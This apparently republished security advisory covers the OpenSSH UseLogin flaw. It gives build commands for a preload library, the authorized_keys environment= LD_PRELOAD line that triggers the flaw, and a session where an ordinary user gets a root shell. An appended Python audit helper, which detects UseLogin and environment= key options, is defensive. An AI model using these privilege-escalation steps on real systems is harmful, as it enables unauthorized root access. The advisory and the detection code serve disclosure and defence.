In our previous article, OpenSSH UseLogin Directive Vulnerability Leads to Remote Root Compromise, we discussed a security vulnerability in OpenSSH that allows a local attacker to gain elevated privileges. The following is exploit code that allows you to test your system for the mentioned vulnerability.
Credit:
The information has been provided by [WaR].
Compile it into a library:
$ gcc -c -o lib.o lib.c
$ ld -shared -o libroot.so lib.o
$ chmod 755 ./libroot.so
Now, for the tricky part:
You must have an account on the machine and create an entry in $HOME/.ssh/authorized_keys (or authorized_keys2) with:
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>
When SSH receives your connection, it exports this variable into the environment before running login. Somewhere after this, it executes a setuid; when it does, it makes a seteuid(0).
$ id
uid=1000(war) gid=100(users) groups=100(users)
$ ssh war@localhost
Enter passphrase for key '/home/war/.ssh/id_dsa':
sh-2.04# id
uid=0(root) gid=100(users) groups=100(users)
This also works remotely. In any case, you must have an account on the victim machine so you can set up the environment and log in. Obviously, it must have UseLogin enabled.
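A defender-side audit for the two preconditions named above (UseLogin enabled in sshd_config, and an authorized_keys entry carrying an environment= option), added here as an example that is not part of the original advisory; file contents are passed in as text and the sample values are constructed.

```python
# Added audit helper, not code from the original advisory: reports the two
# conditions the attack above depends on, UseLogin enabled in sshd_config and
# authorized_keys entries carrying an environment="..." option. Inputs are
# text; the sample values at the bottom are constructed.
import re

KEY_TYPE = re.compile(r"^(ssh-|ecdsa-|sk-|\d)")  # line starts with a key: no options
OPTIONS = re.compile(r'^((?:"[^"]*"|[^\s"])+)\s+')  # option field; quotes may hold spaces

def uselogin_enabled(sshd_config):
    # sshd keywords are case-insensitive and the first match wins.
    for line in sshd_config.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if parts[0].lower() == "uselogin":
            return len(parts) > 1 and parts[1].strip().lower() == "yes"
    return False

def split_options(line):
    # Options precede the key type, comma-separated; quoted values may contain
    # commas or spaces (backslash-escaped quotes are not handled here).
    if KEY_TYPE.match(line):
        return [], line
    m = OPTIONS.match(line)
    if not m:
        return [], line
    opts = re.findall(r'(?:"[^"]*"|[^,"])+', m.group(1))
    return [o.replace('"', "") for o in opts], line[m.end():]

def keys_with_env_option(authorized_keys):
    # (line number, environment assignments) for each key that injects variables.
    hits = []
    for n, raw in enumerate(authorized_keys.splitlines(), 1):
        line = raw.strip()
        if line and not line.startswith("#"):
            envs = [o[len("environment="):] for o in split_options(line)[0]
                    if o.lower().startswith("environment=")]
            if envs:
                hits.append((n, envs))
    return hits

SAMPLE_SSHD_CONFIG = "# constructed sample\nPort 22\nUseLogin yes\n"
SAMPLE_AUTHORIZED_KEYS = (
    "ssh-dss AAAAB3NzaC1kc3MA_SAMPLE war@example\n"
    'environment="LD_PRELOAD=/home/war/libroot.so",no-pty ssh-dss AAAAB3_SAMPLE war@example\n'
    'from="10.0.0.0/8" ssh-rsa AAAAB3_SAMPLE admin@example\n'
)
```

Running the two functions over a host's real /etc/ssh/sshd_config and each user's authorized_keys files flags exactly the setup the session above relies on; setting UseLogin to no removes the precondition.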